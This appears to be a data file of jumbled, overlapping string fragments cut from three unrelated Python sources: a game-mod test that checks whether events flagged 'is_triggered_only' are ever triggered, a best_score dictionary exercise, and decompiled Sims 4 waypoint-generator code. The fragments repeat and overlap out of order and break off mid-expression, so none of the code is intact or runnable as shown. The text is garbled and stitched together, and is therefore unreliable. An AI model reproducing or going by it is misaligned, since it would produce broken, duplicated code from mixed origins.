'aces_killed_each_other.1', 'nuke_dropped.0'] def", "only events\" for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches", "dict() invoked_events_id = [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner,", "lowercase=True) # 4. Check if events are used for event in invoked_events_id: if", "all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1. Get all", "to zero # 3. 
Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id,", "events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\"", "triggered_events_id = dict() invoked_events_id = [] # 1. Get all events code all_events", "'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = []", "are triggered from somewhere # If they not - they'll never be triggered", "pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match", "########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES", "event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first", "false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for", "triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. 
Check if events", "FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events", "somewhere # If they not - they'll never be triggered # By Pelmen,", "up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0", "= event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id =\"", "events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) #", "event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id:", "import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES =", "triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4.", "Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object):", "in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for", "event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in", "in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. 
Check", "re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken", "taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id", "Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is set to", "Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered", "# Default value is set to zero # 3. Get all events triggered", "message=\"Those events have 'is_triggered_only = yes' attr but are never triggered from outside.", "if \"is_triggered_only = yes\" events are triggered from somewhere # If they not", "DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1',", "By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class", "Default value is set to zero # 3. Get all events triggered in", "'#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip()", "def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = [] #", "the \"triggered only events\" for event in all_events: if \"is_triggered_only = yes\" in", "event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part", "all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for event", "all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event)", "2. 
Get the \"triggered only events\" for event in all_events: if \"is_triggered_only =", "triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter", "4. Check if events are used for event in invoked_events_id: if event in", "test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1.", "= [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events", "['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = []", "results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those", "all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only" ]
[ "#!/usr/bin/python3 def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n", "best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n = []", "def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n =", "or a_dictionary == {}: return n = [] for new in a_dictionary: n.append(new)", "<reponame>flourishcodes/holbertonschool-higher_level_programming<filename>0x04-python-more_data_structures/10-best_score.py<gh_stars>0 #!/usr/bin/python3 def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return", "is None or a_dictionary == {}: return n = [] for new in", "None or a_dictionary == {}: return n = [] for new in a_dictionary:", "a_dictionary is None or a_dictionary == {}: return n = [] for new", "a_dictionary == {}: return n = [] for new in a_dictionary: n.append(new) return", "if a_dictionary is None or a_dictionary == {}: return n = [] for", "== {}: return n = [] for new in a_dictionary: n.append(new) return max(n)" ]
[ "uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9", "maximum number of waypoints to visit. Set to 0 to keep going until", "waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph,", "**kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph,", "chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1", "return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not", "{}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint == ending_waypoint: break", "new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint", "import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable", "self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def", "import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the", "at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the", "name: 
T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32:", "[MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at:", "# Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes", "from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n", "connections is None: logger.warn('No connections defined in waypoint graph for waypoint id {}.',", "SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import", "# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of", "choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to", "Set to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0,", "01:40:18 # Size of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver", "(3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900", "of waypoints to visit. 
Set to 0 to keep going until ending_waypoint is", "ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args,", "cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints", "# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64", "Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit", "waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if", "on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will", "_WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n", "resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited =", "= new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for", "from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]", "2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import sims4 from", "TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints',", "(will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator", "id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if 
cur_waypoint == ending_waypoint:", "prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection", "self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver =", "to visit. Set to 0 to keep going until ending_waypoint is reached.\\n ',", "while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if", "import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES", "ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint", "*args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint =", "cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint", "import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator", "one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end", "self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim)", "None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.', 
prev_waypoint) break", "connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will", "waypoints to visit. Set to 0 to keep going until ending_waypoint is reached.\\n", "sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines", "'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to 0 to keep", "to end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The", "for the generator to start at (will choose one based on the tests/weights).\\n", "one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to", "sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between", "= connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint", "if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint id", "at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number", "self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint =", "for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint)", "3.7 (3394) # Decompiled 
from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC", "between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose", "the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to", "routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ =", "based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit.", "get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _", "cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.',", "Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name:", "**kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver)", "end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum", "logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and", "to start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint", "0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None)", "cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph", "# Size of source mod 2**32: 3643 
bytes import sims4 from event_testing.resolver import", "the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to", "connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is", "version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7,", "TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking')", "'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will choose one based on", "= self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint graph", "3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded", "waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint ==", "3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet", "default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n", "reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim", "prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen", "def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = 
SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint,", "_WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES =", "get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is", "0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in", "id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint =", "waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start", "tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. 
Set to 0", "is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None", "at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import sims4", "None: logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint) break", "break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint =", "tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim", "0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)}", "going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args,", "the generator to end at (will choose one based on the tests/weights).\\n '),", "for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint", "self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint graph for", "# Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17", "if connections is None: logger.warn('No connections defined in waypoint graph for waypoint id", "v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22", "Waypoint for the generator to start at (will choose one based on the", "defined in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint =", "cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint", "'), 
'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one based", "is None: logger.warn('No connections defined in waypoint graph for waypoint id {}.', cur_waypoint)", "minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver =", "connection chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited +=", "= self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint =", "based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at", "connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined in waypoint", "mod 2**32: 3643 bytes import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import", "visit. 
Set to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int,", "self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None", "import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger =", "= {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for", "_ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint", "waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint", "in waypoint graph for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph,", "(super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface,", "def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint,", "17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py", "number of waypoints to visit. 
Set to 0 to keep going until ending_waypoint", "64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18", "'), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to 0 to", "Waypoint for the generator to end at (will choose one based on the", "'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one based on", "num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections =", "or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No", "from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1 yield", "= 0 while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint,", "self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited", "= None num_visited = 0 while num_visited < self.max_waypoints or self.max_waypoints == 0:", "2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py #", "num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections", "T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643", "from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange", "self.max_waypoints == 0: connections = 
self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections", "SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self,", "resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No", "waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint", "to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def", "to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0,", "def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint", "__init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint", "# uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python", "= self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints or", "Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator", "maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim)", "ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while", "until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, 
maximum=100)} def __init__(self, *args, **kwargs):", "= sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections", "keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self,", "them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will choose one", "= SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def", "self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None:", "== 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if connections is None: logger.warn('No connections defined", "logger.warn('No connection chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited", "Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source", "= cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from", "start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for", "generator to start at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n", "is None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.', prev_waypoint)", "(AMD64)] # Embedded file name: 
T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size", "The maximum number of waypoints to visit. Set to 0 to keep going", "default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver", "resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface,", "not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint", "else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0", "', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._sim =", "= self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver", "self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent,", "Python 3.7.9 